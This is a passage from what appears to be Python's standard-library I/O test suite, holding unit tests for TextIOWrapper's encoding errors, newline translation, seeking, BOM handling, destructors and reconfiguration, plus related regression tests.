def test_encoding_errors_reading(self):
# (1) default
b = self.BytesIO(b"abc\n\xff\n")
t = self.TextIOWrapper(b, encoding="ascii")
self.assertRaises(UnicodeError, t.read)
# (2) explicit strict
b = self.BytesIO(b"abc\n\xff\n")
t = self.TextIOWrapper(b, encoding="ascii", errors="strict")
self.assertRaises(UnicodeError, t.read)
# (3) ignore
b = self.BytesIO(b"abc\n\xff\n")
t = self.TextIOWrapper(b, encoding="ascii", errors="ignore")
self.assertEqual(t.read(), "abc\n\n")
# (4) replace
b = self.BytesIO(b"abc\n\xff\n")
t = self.TextIOWrapper(b, encoding="ascii", errors="replace")
self.assertEqual(t.read(), "abc\n\ufffd\n")
def test_encoding_errors_writing(self):
# (1) default
b = self.BytesIO()
t = self.TextIOWrapper(b, encoding="ascii")
self.assertRaises(UnicodeError, t.write, "\xff")
# (2) explicit strict
b = self.BytesIO()
t = self.TextIOWrapper(b, encoding="ascii", errors="strict")
self.assertRaises(UnicodeError, t.write, "\xff")
# (3) ignore
b = self.BytesIO()
t = self.TextIOWrapper(b, encoding="ascii", errors="ignore",
newline="\n")
t.write("abc\xffdef\n")
t.flush()
self.assertEqual(b.getvalue(), b"abcdef\n")
# (4) replace
b = self.BytesIO()
t = self.TextIOWrapper(b, encoding="ascii", errors="replace",
newline="\n")
t.write("abc\xffdef\n")
t.flush()
self.assertEqual(b.getvalue(), b"abc?def\n")
def test_newlines(self):
input_lines = [ "unix\n", "windows\r\n", "os9\r", "last\n", "nonl" ]
tests = [
[ None, [ 'unix\n', 'windows\n', 'os9\n', 'last\n', 'nonl' ] ],
[ '', input_lines ],
[ '\n', [ "unix\n", "windows\r\n", "os9\rlast\n", "nonl" ] ],
[ '\r\n', [ "unix\nwindows\r\n", "os9\rlast\nnonl" ] ],
[ '\r', [ "unix\nwindows\r", "\nos9\r", "last\nnonl" ] ],
]
encodings = (
'utf-8', 'latin-1',
'utf-16', 'utf-16-le', 'utf-16-be',
'utf-32', 'utf-32-le', 'utf-32-be',
)
# Try a range of buffer sizes to test the case where \r is the last
# character in TextIOWrapper._pending_line.
for encoding in encodings:
# XXX: str.encode() should return bytes
data = bytes(''.join(input_lines).encode(encoding))
for do_reads in (False, True):
for bufsize in range(1, 10):
for newline, exp_lines in tests:
bufio = self.BufferedReader(self.BytesIO(data), bufsize)
textio = self.TextIOWrapper(bufio, newline=newline,
encoding=encoding)
if do_reads:
got_lines = []
while True:
c2 = textio.read(2)
if c2 == '':
break
self.assertEqual(len(c2), 2)
got_lines.append(c2 + textio.readline())
else:
got_lines = list(textio)
for got_line, exp_line in zip(got_lines, exp_lines):
self.assertEqual(got_line, exp_line)
self.assertEqual(len(got_lines), len(exp_lines))
def test_newlines_input(self):
testdata = b"AAA\nBB\x00B\nCCC\rDDD\rEEE\r\nFFF\r\nGGG"
normalized = testdata.replace(b"\r\n", b"\n").replace(b"\r", b"\n")
for newline, expected in [
(None, normalized.decode("ascii").splitlines(keepends=True)),
("", testdata.decode("ascii").splitlines(keepends=True)),
("\n", ["AAA\n", "BB\x00B\n", "CCC\rDDD\rEEE\r\n", "FFF\r\n", "GGG"]),
("\r\n", ["AAA\nBB\x00B\nCCC\rDDD\rEEE\r\n", "FFF\r\n", "GGG"]),
("\r", ["AAA\nBB\x00B\nCCC\r", "DDD\r", "EEE\r", "\nFFF\r", "\nGGG"]),
]:
buf = self.BytesIO(testdata)
txt = self.TextIOWrapper(buf, encoding="ascii", newline=newline)
self.assertEqual(txt.readlines(), expected)
txt.seek(0)
self.assertEqual(txt.read(), "".join(expected))
def test_newlines_output(self):
testdict = {
"": b"AAA\nBBB\nCCC\nX\rY\r\nZ",
"\n": b"AAA\nBBB\nCCC\nX\rY\r\nZ",
"\r": b"AAA\rBBB\rCCC\rX\rY\r\rZ",
"\r\n": b"AAA\r\nBBB\r\nCCC\r\nX\rY\r\r\nZ",
}
tests = [(None, testdict[os.linesep])] + sorted(testdict.items())
for newline, expected in tests:
buf = self.BytesIO()
txt = self.TextIOWrapper(buf, encoding="ascii", newline=newline)
txt.write("AAA\nB")
txt.write("BB\nCCC\n")
txt.write("X\rY\r\nZ")
txt.flush()
self.assertEqual(buf.closed, False)
self.assertEqual(buf.getvalue(), expected)
def test_destructor(self):
l = []
base = self.BytesIO
class MyBytesIO(base):
def close(self):
l.append(self.getvalue())
base.close(self)
b = MyBytesIO()
t = self.TextIOWrapper(b, encoding="ascii")
t.write("abc")
del t
support.gc_collect()
self.assertEqual([b"abc"], l)
def test_override_destructor(self):
record = []
class MyTextIO(self.TextIOWrapper):
def __del__(self):
record.append(1)
try:
f = super().__del__
except AttributeError:
pass
else:
f()
def close(self):
record.append(2)
super().close()
def flush(self):
record.append(3)
super().flush()
b = self.BytesIO()
t = MyTextIO(b, encoding="ascii")
del t
support.gc_collect()
self.assertEqual(record, [1, 2, 3])
def test_error_through_destructor(self):
# Test that the exception state is not modified by a destructor,
# even if close() fails.
rawio = self.CloseFailureIO()
def f():
self.TextIOWrapper(rawio).xyzzy
with support.captured_output("stderr") as s:
self.assertRaises(AttributeError, f)
s = s.getvalue().strip()
if s:
# The destructor *may* have printed an unraisable error, check it
self.assertEqual(len(s.splitlines()), 1)
self.assertTrue(s.startswith("Exception OSError: "), s)
self.assertTrue(s.endswith(" ignored"), s)
# Systematic tests of the text I/O API
def test_basic_io(self):
for chunksize in (1, 2, 3, 4, 5, 15, 16, 17, 31, 32, 33, 63, 64, 65):
for enc in "ascii", "latin-1", "utf-8" :# , "utf-16-be", "utf-16-le":
f = self.open(support.TESTFN, "w+", encoding=enc)
f._CHUNK_SIZE = chunksize
self.assertEqual(f.write("abc"), 3)
f.close()
f = self.open(support.TESTFN, "r+", encoding=enc)
f._CHUNK_SIZE = chunksize
self.assertEqual(f.tell(), 0)
self.assertEqual(f.read(), "abc")
cookie = f.tell()
self.assertEqual(f.seek(0), 0)
self.assertEqual(f.read(None), "abc")
f.seek(0)
self.assertEqual(f.read(2), "ab")
self.assertEqual(f.read(1), "c")
self.assertEqual(f.read(1), "")
self.assertEqual(f.read(), "")
self.assertEqual(f.tell(), cookie)
self.assertEqual(f.seek(0), 0)
self.assertEqual(f.seek(0, 2), cookie)
self.assertEqual(f.write("def"), 3)
self.assertEqual(f.seek(cookie), cookie)
self.assertEqual(f.read(), "def")
if enc.startswith("utf"):
self.multi_line_test(f, enc)
f.close()
def multi_line_test(self, f, enc):
f.seek(0)
f.truncate()
sample = "s\xff\u0fff\uffff"
wlines = []
for size in (0, 1, 2, 3, 4, 5, 30, 31, 32, 33, 62, 63, 64, 65, 1000):
chars = []
for i in range(size):
chars.append(sample[i % len(sample)])
line = "".join(chars) + "\n"
wlines.append((f.tell(), line))
f.write(line)
f.seek(0)
rlines = []
while True:
pos = f.tell()
line = f.readline()
if not line:
break
rlines.append((pos, line))
self.assertEqual(rlines, wlines)
def test_telling(self):
f = self.open(support.TESTFN, "w+", encoding="utf-8")
p0 = f.tell()
f.write("\xff\n")
p1 = f.tell()
f.write("\xff\n")
p2 = f.tell()
f.seek(0)
self.assertEqual(f.tell(), p0)
self.assertEqual(f.readline(), "\xff\n")
self.assertEqual(f.tell(), p1)
self.assertEqual(f.readline(), "\xff\n")
self.assertEqual(f.tell(), p2)
f.seek(0)
for line in f:
self.assertEqual(line, "\xff\n")
self.assertRaises(OSError, f.tell)
self.assertEqual(f.tell(), p2)
f.close()
def test_seeking(self):
chunk_size = _default_chunk_size()
prefix_size = chunk_size - 2
u_prefix = "a" * prefix_size
prefix = bytes(u_prefix.encode("utf-8"))
self.assertEqual(len(u_prefix), len(prefix))
u_suffix = "\u8888\n"
suffix = bytes(u_suffix.encode("utf-8"))
line = prefix + suffix
with self.open(support.TESTFN, "wb") as f:
f.write(line*2)
with self.open(support.TESTFN, "r", encoding="utf-8") as f:
s = f.read(prefix_size)
self.assertEqual(s, str(prefix, "ascii"))
self.assertEqual(f.tell(), prefix_size)
self.assertEqual(f.readline(), u_suffix)
def test_seeking_too(self):
# Regression test for a specific bug
data = b'\xe0\xbf\xbf\n'
with self.open(support.TESTFN, "wb") as f:
f.write(data)
with self.open(support.TESTFN, "r", encoding="utf-8") as f:
f._CHUNK_SIZE # Just test that it exists
f._CHUNK_SIZE = 2
f.readline()
f.tell()
def test_seek_and_tell(self):
#Test seek/tell using the StatefulIncrementalDecoder.
# Make test faster by doing smaller seeks
CHUNK_SIZE = 128
def test_seek_and_tell_with_data(data, min_pos=0):
"""Tell/seek to various points within a data stream and ensure
that the decoded data returned by read() is consistent."""
f = self.open(support.TESTFN, 'wb')
f.write(data)
f.close()
f = self.open(support.TESTFN, encoding='test_decoder')
f._CHUNK_SIZE = CHUNK_SIZE
decoded = f.read()
f.close()
for i in range(min_pos, len(decoded) + 1): # seek positions
for j in [1, 5, len(decoded) - i]: # read lengths
f = self.open(support.TESTFN, encoding='test_decoder')
self.assertEqual(f.read(i), decoded[:i])
cookie = f.tell()
self.assertEqual(f.read(j), decoded[i:i + j])
f.seek(cookie)
self.assertEqual(f.read(), decoded[i:])
f.close()
# Enable the test decoder.
StatefulIncrementalDecoder.codecEnabled = 1
# Run the tests.
try:
# Try each test case.
for input, _, _ in StatefulIncrementalDecoderTest.test_cases:
test_seek_and_tell_with_data(input)
# Position each test case so that it crosses a chunk boundary.
for input, _, _ in StatefulIncrementalDecoderTest.test_cases:
offset = CHUNK_SIZE - len(input)//2
prefix = b'.'*offset
# Don't bother seeking into the prefix (takes too long).
min_pos = offset*2
test_seek_and_tell_with_data(prefix + input, min_pos)
# Ensure our test decoder won't interfere with subsequent tests.
finally:
StatefulIncrementalDecoder.codecEnabled = 0
def test_encoded_writes(self):
data = "1234567890"
tests = ("utf-16",
"utf-16-le",
"utf-16-be",
"utf-32",
"utf-32-le",
"utf-32-be")
for encoding in tests:
buf = self.BytesIO()
f = self.TextIOWrapper(buf, encoding=encoding)
# Check if the BOM is written only once (see issue1753).
f.write(data)
f.write(data)
f.seek(0)
self.assertEqual(f.read(), data * 2)
f.seek(0)
self.assertEqual(f.read(), data * 2)
self.assertEqual(buf.getvalue(), (data * 2).encode(encoding))
def test_unreadable(self):
class UnReadable(self.BytesIO):
def readable(self):
return False
txt = self.TextIOWrapper(UnReadable())
self.assertRaises(OSError, txt.read)
def test_read_one_by_one(self):
txt = self.TextIOWrapper(self.BytesIO(b"AA\r\nBB"))
reads = ""
while True:
c = txt.read(1)
if not c:
break
reads += c
self.assertEqual(reads, "AA\nBB")
def test_readlines(self):
txt = self.TextIOWrapper(self.BytesIO(b"AA\nBB\nCC"))
self.assertEqual(txt.readlines(), ["AA\n", "BB\n", "CC"])
txt.seek(0)
self.assertEqual(txt.readlines(None), ["AA\n", "BB\n", "CC"])
txt.seek(0)
self.assertEqual(txt.readlines(5), ["AA\n", "BB\n"])
# read in amounts equal to TextIOWrapper._CHUNK_SIZE which is 128.
def test_read_by_chunk(self):
# make sure "\r\n" straddles 128 char boundary.
txt = self.TextIOWrapper(self.BytesIO(b"A" * 127 + b"\r\nB"))
reads = ""
while True:
c = txt.read(128)
if not c:
break
reads += c
self.assertEqual(reads, "A"*127+"\nB")
def test_writelines(self):
l = ['ab', 'cd', 'ef']
buf = self.BytesIO()
txt = self.TextIOWrapper(buf)
txt.writelines(l)
txt.flush()
self.assertEqual(buf.getvalue(), b'abcdef')
def test_writelines_userlist(self):
l = UserList(['ab', 'cd', 'ef'])
buf = self.BytesIO()
txt = self.TextIOWrapper(buf)
txt.writelines(l)
txt.flush()
self.assertEqual(buf.getvalue(), b'abcdef')
def test_writelines_error(self):
txt = self.TextIOWrapper(self.BytesIO())
self.assertRaises(TypeError, txt.writelines, [1, 2, 3])
self.assertRaises(TypeError, txt.writelines, None)
self.assertRaises(TypeError, txt.writelines, b'abc')
def test_issue1395_1(self):
txt = self.TextIOWrapper(self.BytesIO(self.testdata), encoding="ascii")
# read one char at a time
reads = ""
while True:
c = txt.read(1)
if not c:
break
reads += c
self.assertEqual(reads, self.normalized)
def test_issue1395_2(self):
txt = self.TextIOWrapper(self.BytesIO(self.testdata), encoding="ascii")
txt._CHUNK_SIZE = 4
reads = ""
while True:
c = txt.read(4)
if not c:
break
reads += c
self.assertEqual(reads, self.normalized)
def test_issue1395_3(self):
txt = self.TextIOWrapper(self.BytesIO(self.testdata), encoding="ascii")
txt._CHUNK_SIZE = 4
reads = txt.read(4)
reads += txt.read(4)
reads += txt.readline()
reads += txt.readline()
reads += txt.readline()
self.assertEqual(reads, self.normalized)
def test_issue1395_4(self):
txt = self.TextIOWrapper(self.BytesIO(self.testdata), encoding="ascii")
txt._CHUNK_SIZE = 4
reads = txt.read(4)
reads += txt.read()
self.assertEqual(reads, self.normalized)
def test_issue1395_5(self):
txt = self.TextIOWrapper(self.BytesIO(self.testdata), encoding="ascii")
txt._CHUNK_SIZE = 4
reads = txt.read(4)
pos = txt.tell()
txt.seek(0)
txt.seek(pos)
self.assertEqual(txt.read(4), "BBB\n")
def test_issue2282(self):
buffer = self.BytesIO(self.testdata)
txt = self.TextIOWrapper(buffer, encoding="ascii")
self.assertEqual(buffer.seekable(), txt.seekable())
def test_append_bom(self):
# The BOM is not written again when appending to a non-empty file
filename = support.TESTFN
for charset in ('utf-8-sig', 'utf-16', 'utf-32'):
with self.open(filename, 'w', encoding=charset) as f:
f.write('aaa')
pos = f.tell()
with self.open(filename, 'rb') as f:
self.assertEqual(f.read(), 'aaa'.encode(charset))
with self.open(filename, 'a', encoding=charset) as f:
f.write('xxx')
with self.open(filename, 'rb') as f:
self.assertEqual(f.read(), 'aaaxxx'.encode(charset))
def test_seek_bom(self):
# Same test, but when seeking manually
filename = support.TESTFN
for charset in ('utf-8-sig', 'utf-16', 'utf-32'):
with self.open(filename, 'w', encoding=charset) as f:
f.write('aaa')
pos = f.tell()
with self.open(filename, 'r+', encoding=charset) as f:
f.seek(pos)
f.write('zzz')
f.seek(0)
f.write('bbb')
with self.open(filename, 'rb') as f:
self.assertEqual(f.read(), 'bbbzzz'.encode(charset))
def test_seek_append_bom(self):
# Same test, but first seek to the start and then to the end
filename = support.TESTFN
for charset in ('utf-8-sig', 'utf-16', 'utf-32'):
with self.open(filename, 'w', encoding=charset) as f:
f.write('aaa')
with self.open(filename, 'a', encoding=charset) as f:
f.seek(0)
f.seek(0, self.SEEK_END)
f.write('xxx')
with self.open(filename, 'rb') as f:
self.assertEqual(f.read(), 'aaaxxx'.encode(charset))
def test_errors_property(self):
with self.open(support.TESTFN, "w") as f:
self.assertEqual(f.errors, "strict")
with self.open(support.TESTFN, "w", errors="replace") as f:
self.assertEqual(f.errors, "replace")
@support.no_tracing
def test_threads_write(self):
# Issue6750: concurrent writes could duplicate data
event = threading.Event()
with self.open(support.TESTFN, "w", buffering=1) as f:
def run(n):
text = "Thread%03d\n" % n
event.wait()
f.write(text)
threads = [threading.Thread(target=run, args=(x,))
for x in range(20)]
with support.start_threads(threads, event.set):
time.sleep(0.02)
with self.open(support.TESTFN) as f:
content = f.read()
for n in range(20):
self.assertEqual(content.count("Thread%03d\n" % n), 1)
def test_flush_error_on_close(self):
# Test that text file is closed despite failed flush
# and that flush() is called before file closed.
txt = self.TextIOWrapper(self.BytesIO(self.testdata), encoding="ascii")
closed = []
def bad_flush():
closed[:] = [txt.closed, txt.buffer.closed]
raise OSError()
txt.flush = bad_flush
self.assertRaises(OSError, txt.close) # exception not swallowed
self.assertTrue(txt.closed)
self.assertTrue(txt.buffer.closed)
self.assertTrue(closed) # flush() called
self.assertFalse(closed[0]) # flush() called before file closed
self.assertFalse(closed[1])
txt.flush = lambda: None # break reference loop
def test_close_error_on_close(self):
buffer = self.BytesIO(self.testdata)
def bad_flush():
raise OSError('flush')
def bad_close():
raise OSError('close')
buffer.close = bad_close
txt = self.TextIOWrapper(buffer, encoding="ascii")
txt.flush = bad_flush
with self.assertRaises(OSError) as err: # exception not swallowed
txt.close()
self.assertEqual(err.exception.args, ('close',))
self.assertIsInstance(err.exception.__context__, OSError)
self.assertEqual(err.exception.__context__.args, ('flush',))
self.assertFalse(txt.closed)
def test_nonnormalized_close_error_on_close(self):
# Issue #21677
buffer = self.BytesIO(self.testdata)
def bad_flush():
raise non_existing_flush
def bad_close():
raise non_existing_close
buffer.close = bad_close
txt = self.TextIOWrapper(buffer, encoding="ascii")
txt.flush = bad_flush
with self.assertRaises(NameError) as err: # exception not swallowed
txt.close()
self.assertIn('non_existing_close', str(err.exception))
self.assertIsInstance(err.exception.__context__, NameError)
self.assertIn('non_existing_flush', str(err.exception.__context__))
self.assertFalse(txt.closed)
def test_multi_close(self):
txt = self.TextIOWrapper(self.BytesIO(self.testdata), encoding="ascii")
txt.close()
txt.close()
txt.close()
self.assertRaises(ValueError, txt.flush)
def test_unseekable(self):
txt = self.TextIOWrapper(self.MockUnseekableIO(self.testdata))
self.assertRaises(self.UnsupportedOperation, txt.tell)
self.assertRaises(self.UnsupportedOperation, txt.seek, 0)
def test_readonly_attributes(self):
txt = self.TextIOWrapper(self.BytesIO(self.testdata), encoding="ascii")
buf = self.BytesIO(self.testdata)
with self.assertRaises(AttributeError):
txt.buffer = buf
def test_rawio(self):
# Issue #12591: TextIOWrapper must work with raw I/O objects, so
# that subprocess.Popen() can have the required unbuffered
# semantics with universal_newlines=True.
raw = self.MockRawIO([b'abc', b'def', b'ghi\njkl\nopq\n'])
txt = self.TextIOWrapper(raw, encoding='ascii', newline='\n')
# Reads
self.assertEqual(txt.read(4), 'abcd')
self.assertEqual(txt.readline(), 'efghi\n')
self.assertEqual(list(txt), ['jkl\n', 'opq\n'])
def test_rawio_write_through(self):
# Issue #12591: with write_through=True, writes don't need a flush
raw = self.MockRawIO([b'abc', b'def', b'ghi\njkl\nopq\n'])
txt = self.TextIOWrapper(raw, encoding='ascii', newline='\n',
write_through=True)
txt.write('1')
txt.write('23\n4')
txt.write('5')
self.assertEqual(b''.join(raw._write_stack), b'123\n45')
def test_bufio_write_through(self):
# Issue #21396: write_through=True doesn't force a flush()
# on the underlying binary buffered object.
flush_called, write_called = [], []
class BufferedWriter(self.BufferedWriter):
def flush(self, *args, **kwargs):
flush_called.append(True)
return super().flush(*args, **kwargs)
def write(self, *args, **kwargs):
write_called.append(True)
return super().write(*args, **kwargs)
rawio = self.BytesIO()
data = b"a"
bufio = BufferedWriter(rawio, len(data)*2)
textio = self.TextIOWrapper(bufio, encoding='ascii',
write_through=True)
# write to the buffered io but don't overflow the buffer
text = data.decode('ascii')
textio.write(text)
# buffer.flush is not called with write_through=True
self.assertFalse(flush_called)
# buffer.write *is* called with write_through=True
self.assertTrue(write_called)
self.assertEqual(rawio.getvalue(), b"") # no flush
write_called = [] # reset
textio.write(text * 10) # total content is larger than bufio buffer
self.assertTrue(write_called)
self.assertEqual(rawio.getvalue(), data * 11) # all flushed
def test_reconfigure_write_through(self):
raw = self.MockRawIO([])
t = self.TextIOWrapper(raw, encoding='ascii', newline='\n')
t.write('1')
t.reconfigure(write_through=True) # implied flush
self.assertEqual(t.write_through, True)
self.assertEqual(b''.join(raw._write_stack), b'1')
t.write('23')
self.assertEqual(b''.join(raw._write_stack), b'123')
t.reconfigure(write_through=False)
self.assertEqual(t.write_through, False)
t.write('45')
t.flush()
self.assertEqual(b''.join(raw._write_stack), b'12345')
# Keeping default value
t.reconfigure()
t.reconfigure(write_through=None)
self.assertEqual(t.write_through, False)
t.reconfigure(write_through=True)
t.reconfigure()
t.reconfigure(write_through=None)
self.assertEqual(t.write_through, True)
def test_read_nonbytes(self):
# Issue #17106
# Crash when underlying read() returns non-bytes
t = self.TextIOWrapper(self.StringIO('a'))
self.assertRaises(TypeError, t.read, 1)
t = self.TextIOWrapper(self.StringIO('a'))
self.assertRaises(TypeError, t.readline)
t = self.TextIOWrapper(self.StringIO('a'))
self.assertRaises(TypeError, t.read)
def test_illegal_encoder(self):
# Issue 31271: Calling write() while the return value of encoder's
# encode() is invalid shouldn't cause an assertion failure.
rot13 = codecs.lookup("rot13")
with support.swap_attr(rot13, '_is_text_encoding', True):
t = io.TextIOWrapper(io.BytesIO(b'foo'), encoding="rot13")
self.assertRaises(TypeError, t.write, 'bar')
def test_illegal_decoder(self):
# Issue #17106
# Bypass the early encoding check added in issue 20404
def _make_illegal_wrapper():
quopri = codecs.lookup("quopri")
quopri._is_text_encoding = True
try:
t = self.TextIOWrapper(self.BytesIO(b'aaaaaa'),
newline='\n', encoding="quopri")
finally:
quopri._is_text_encoding = False
return t
# Crash when decoder returns non-string
t = _make_illegal_wrapper()
self.assertRaises(TypeError, t.read, 1)
t = _make_illegal_wrapper()
self.assertRaises(TypeError, t.readline)
t = _make_illegal_wrapper()
self.assertRaises(TypeError, t.read)
# Issue 31243: calling read() while the return value of decoder's
# getstate() is invalid should neither crash the interpreter nor
# raise a SystemError.
def _make_very_illegal_wrapper(getstate_ret_val):
class BadDecoder:
def getstate(self):
return getstate_ret_val
def _get_bad_decoder(dummy):
return BadDecoder()
quopri = codecs.lookup("quopri")
with support.swap_attr(quopri, 'incrementaldecoder',
_get_bad_decoder):
return _make_illegal_wrapper()
t = _make_very_illegal_wrapper(42)
self.assertRaises(TypeError, t.read, 42)
t = _make_very_illegal_wrapper(())
self.assertRaises(TypeError, t.read, 42)
t = _make_very_illegal_wrapper((1, 2))
self.assertRaises(TypeError, t.read, 42)
def _check_create_at_shutdown(self, **kwargs):
# Issue #20037: creating a TextIOWrapper at shutdown
# shouldn't crash the interpreter.
iomod = self.io.__name__
code = """if 1:
import codecs
import {iomod} as io
# Avoid looking up codecs at shutdown
codecs.lookup('utf-8')
class C:
def __init__(self):
self.buf = io.BytesIO()
def __del__(self):
io.TextIOWrapper(self.buf, **{kwargs})
print("ok")
c = C()
""".format(iomod=iomod, kwargs=kwargs)
return assert_python_ok("-c", code)
@support.requires_type_collecting
def test_create_at_shutdown_without_encoding(self):
rc, out, err = self._check_create_at_shutdown()
if err:
# Can error out with a RuntimeError if the module state
# isn't found.
self.assertIn(self.shutdown_error, err.decode())
else:
self.assertEqual("ok", out.decode().strip())
@support.requires_type_collecting
def test_create_at_shutdown_with_encoding(self):
rc, out, err = self._check_create_at_shutdown(encoding='utf-8',
errors='strict')
self.assertFalse(err)
self.assertEqual("ok", out.decode().strip())
def test_read_byteslike(self):
r = MemviewBytesIO(b'Just some random string\n')
t = self.TextIOWrapper(r, 'utf-8')
# TextIOwrapper will not read the full string, because
# we truncate it to a multiple of the native int size
# so that we can construct a more complex memoryview.
bytes_val = _to_memoryview(r.getvalue()).tobytes()
self.assertEqual(t.read(200), bytes_val.decode('utf-8'))
def test_issue22849(self):
class F(object):
def readable(self): return True
def writable(self): return True
def seekable(self): return True
for i in range(10):
try:
self.TextIOWrapper(F(), encoding='utf-8')
except Exception:
pass
F.tell = lambda x: 0
t = self.TextIOWrapper(F(), encoding='utf-8')
def test_reconfigure_encoding_read(self):
# latin1 -> utf8
# (latin1 can decode utf-8 encoded string)
data = 'abc\xe9\n'.encode('latin1') + 'd\xe9f\n'.encode('utf8')
raw = self.BytesIO(data)
txt = self.TextIOWrapper(raw, encoding='latin1', newline='\n')
self.assertEqual(txt.readline(), 'abc\xe9\n')
with self.assertRaises(self.UnsupportedOperation):
txt.reconfigure(encoding='utf-8')
with self.assertRaises(self.UnsupportedOperation):
txt.reconfigure(newline=None)
def test_reconfigure_write_fromascii(self):
# ascii has a specific encodefunc in the C implementation,
# but utf-8-sig has not. Make sure that we get rid of the
# cached encodefunc when we switch encoders.
raw = self.BytesIO()
txt = self.TextIOWrapper(raw, encoding='ascii', newline='\n')
txt.write('foo\n')
txt.reconfigure(encoding='utf-8-sig')
txt.write('\xe9\n')
txt.flush()
self.assertEqual(raw.getvalue(), b'foo\n\xc3\xa9\n')
def test_reconfigure_write(self):
# latin -> utf8
raw = self.BytesIO()
txt = self.TextIOWrapper(raw, encoding='latin1', newline='\n')
txt.write('abc\xe9\n')
txt.reconfigure(encoding='utf-8')
self.assertEqual(raw.getvalue(), b'abc\xe9\n')
txt.write('d\xe9f\n')
txt.flush()
self.assertEqual(raw.getvalue(), b'abc\xe9\nd\xc3\xa9f\n')
# ascii -> utf-8-sig: ensure that no BOM is written in the middle of
# the file
raw = self.BytesIO()
txt = self.TextIOWrapper(raw, encoding='ascii', newline='\n')
txt.write('abc\n')
txt.reconfigure(encoding='utf-8-sig')
txt.write('d\xe9f\n')
txt.flush()
self.assertEqual(raw.getvalue(), b'abc\nd\xc3\xa9f\n')
def test_reconfigure_write_non_seekable(self):
raw = self.BytesIO()
raw.seekable = lambda: False
raw.seek = None
txt = self.TextIOWrapper(raw, encoding='ascii', newline='\n')
txt.write('abc\n')
txt.reconfigure(encoding='utf-8-sig')
txt.write('d\xe9f\n')
txt.flush()
# If the raw stream is not seekable, there'll be a BOM
self.assertEqual(raw.getvalue(), b'abc\n\xef\xbb\xbfd\xc3\xa9f\n')
def test_reconfigure_defaults(self):
txt = self.TextIOWrapper(self.BytesIO(), 'ascii', 'replace', '\n')
txt.reconfigure(encoding=None)
self.assertEqual(txt.encoding, 'ascii')
self.assertEqual(txt.errors, 'replace')
txt.write('LF\n')
txt.reconfigure(newline='\r\n')
self.assertEqual(txt.encoding, 'ascii')
self.assertEqual(txt.errors, 'replace')
txt.reconfigure(errors='ignore')
self.assertEqual(txt.encoding, 'ascii')
self.assertEqual(txt.errors, 'ignore')
txt.write('CRLF\n')
txt.reconfigure(encoding='utf-8', newline=None)
self.assertEqual(txt.errors, 'strict')
txt.seek(0)
self.assertEqual(txt.read(), 'LF\nCRLF\n')
self.assertEqual(txt.detach().getvalue(), b'LF\nCRLF\r\n')
def test_reconfigure_newline(self):
raw = self.BytesIO(b'CR\rEOF')
txt = self.TextIOWrapper(raw, 'ascii', newline='\n')
txt.reconfigure(newline=None)
self.assertEqual(txt.readline(), 'CR\n')
raw = self.BytesIO(b'CR\rEOF')
txt = self.TextIOWrapper(raw, 'ascii', newline='\n')
txt.reconfigure(newline='')
self.assertEqual(txt.readline(), 'CR\r')
raw = self.BytesIO(b'CR\rLF\nEOF')
txt = self.TextIOWrapper(raw, 'ascii', newline='\r')
txt.reconfigure(newline='\n')
self.assertEqual(txt.readline(), 'CR\rLF\n')
raw = self.BytesIO(b'LF\nCR\rEOF')
txt = self.TextIOWrapper(raw, 'ascii', newline='\n')
txt.reconfigure(newline='\r')
self.assertEqual(txt.readline(), 'LF\nCR\r')
raw = self.BytesIO(b'CR\rCRLF\r\nEOF')
txt = self.TextIOWrapper(raw, 'ascii', newline='\r')
txt.reconfigure(newline='\r\n')
self.assertEqual(txt.readline(), 'CR\rCRLF\r\n')
txt = self.TextIOWrapper(self.BytesIO(), 'ascii', newline='\r')
txt.reconfigure(newline=None)
txt.write('linesep\n')
txt.reconfigure(newline='')
txt.write('LF\n')
txt.reconfigure(newline='\n')
txt.write('LF\n')
txt.reconfigure(newline='\r')
txt.write('CR\n')
txt.reconfigure(newline='\r\n')
txt.write('CRLF\n')
expected = 'linesep' + os.linesep + 'LF\nLF\nCR\rCRLF\r\n'
self.assertEqual(txt.detach().getvalue().decode('ascii'), expected)
def test_issue25862(self):
# Assertion failures occurred in tell() after read() and write().
t = self.TextIOWrapper(self.BytesIO(b'test'), encoding='ascii')
t.read(1)
t.read()
t.tell()
t = self.TextIOWrapper(self.BytesIO(b'test'), encoding='ascii')
t.read(1)
t.write('x')
t.tell()
class MemviewBytesIO(io.BytesIO):
'''A BytesIO object whose read method returns memoryviews
rather than bytes'''
def read1(self, len_):
return _to_memoryview(super().read1(len_))
def read(self, len_):
return _to_memoryview(super().read(len_))
def _to_memoryview(buf):
'''Convert bytes-object *buf* to a non-trivial memoryview'''
arr = array.array('i')
idx = len(buf) - len(buf) % arr.itemsize
arr.frombytes(buf[:idx])
return memoryview(arr)
class CTextIOWrapperTest(TextIOWrapperTest):
io = io
shutdown_error = "RuntimeError: could not find io module state"
def test_initialization(self):
r = self.BytesIO(b"\xc3\xa9\n\n")
b = self.BufferedReader(r, 1000)
t = self.TextIOWrapper(b)
self.assertRaises(ValueError, t.__init__, b, newline='xyzzy')
self.assertRaises(ValueError, t.read)
t = self.TextIOWrapper.__new__(self.TextIOWrapper)
self.assertRaises(Exception, repr, t)
def test_garbage_collection(self):
# C TextIOWrapper objects are collected, and collecting them flushes
# all data to disk.
# The Python version has __del__, so it ends in gc.garbage instead.
with support.check_warnings(('', ResourceWarning)):
rawio = io.FileIO(support.TESTFN, "wb")
b = self.BufferedWriter(rawio)
t = self.TextIOWrapper(b, encoding="ascii")
t.write("456def")
t.x = t
wr = weakref.ref(t)
del t
support.gc_collect()
self.assertIsNone(wr(), wr)
with self.open(support.TESTFN, "rb") as f:
self.assertEqual(f.read(), b"456def")
def test_rwpair_cleared_before_textio(self):
# Issue 13070: TextIOWrapper's finalization would crash when called
# after the reference to the underlying BufferedRWPair's writer got
# cleared by the GC.
for i in range(1000):
b1 = self.BufferedRWPair(self.MockRawIO(), self.MockRawIO())
t1 = self.TextIOWrapper(b1, encoding="ascii")
b2 = self.BufferedRWPair(self.MockRawIO(), self.MockRawIO())
t2 = self.TextIOWrapper(b2, encoding="ascii")
# circular references
t1.buddy = t2
t2.buddy = t1
support.gc_collect()
def test_del__CHUNK_SIZE_SystemError(self):
t = self.TextIOWrapper(self.BytesIO(), encoding='ascii')
with self.assertRaises(AttributeError):
del t._CHUNK_SIZE
class PyTextIOWrapperTest(TextIOWrapperTest):
io = pyio
shutdown_error = "LookupError: unknown encoding: ascii"
class IncrementalNewlineDecoderTest(unittest.TestCase):
def check_newline_decoding_utf8(self, decoder):
# UTF-8 specific tests for a newline decoder
def _check_decode(b, s, **kwargs):
# We exercise getstate() / setstate() as well as decode()
state = decoder.getstate()
self.assertEqual(decoder.decode(b, **kwargs), s)
